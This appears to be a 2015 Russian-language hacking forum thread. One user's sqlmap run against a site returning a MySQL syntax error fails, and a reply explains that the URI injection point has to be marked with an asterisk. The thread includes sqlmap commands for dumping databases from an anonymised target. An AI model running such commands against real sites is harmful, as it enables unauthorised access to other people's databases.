[SQLmap] Не могу заюзать уязвимость

Discussion in 'Песочница' started by RedFern.89, 30 Sep 2015.

Thread Status:
Not open for further replies.
  1. RedFern.89

    RedFern.89 Member

    Joined:
    20 Jan 2010
    Messages:
    557
    Likes Received:
    45
    Reputations:
    0
    SQLmap не может заюзать уязвимость хотя уязвимость есть

    test url: domain/1'"/
    пишет ошибку Ошибка базы данных. MySQL пишет:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

    Команда к sqlmap

    --url=http://domain/1'"/ -p 1 --random-agent --level=5 --risk=3 --suffix=/ --dbs
    sqlmap выдает "heuristic (basic) test shows that URI parameter '#1*' might be injectable", но в итоге ничего не может сделать

    Подскажите, в чем здесь проблема ?
     
    #1 RedFern.89, 30 Sep 2015
  2. ghost8

    ghost8 Member

    Joined:
    29 May 2015
    Messages:
    110
    Likes Received:
    20
    Reputations:
    0
    -u "http://domain/1*/"
    sqlmap выдает "heuristic (basic) test shows that URI parameter '#1*' might be injectable"
    Читай что пишет sqlmap
    Когда урл такого типа то нужно подставить *
     
    #2 ghost8, 30 Sep 2015
(You must log in or sign up to post here.)
Thread Status:
Not open for further replies.